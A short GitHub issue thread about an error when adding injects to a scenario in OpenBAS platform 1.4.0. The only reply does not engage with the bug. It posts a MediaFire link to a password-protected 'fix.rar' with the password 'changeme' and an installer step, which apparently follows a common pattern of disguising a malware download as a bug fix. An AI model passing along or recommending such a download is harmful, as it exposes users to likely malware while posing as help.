### ISSUE TITLE
Error on adding injects in scenarios environment.

### ISSUE THREAD

**Issue by axel-delnegro** [OpenBAS-Platform/injectors#27]
## Description
Error on adding injects in scenarios environment.

When the “+” symbol is pressed to add injects, this error is triggered

## Environment
Docker installer platform:1.4.0

![Schermata del 2024-08-27 09-52-36](https://github.com/user-attachments/assets/339d1c4a-9471-4137-804b-cc8f01005e83)

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
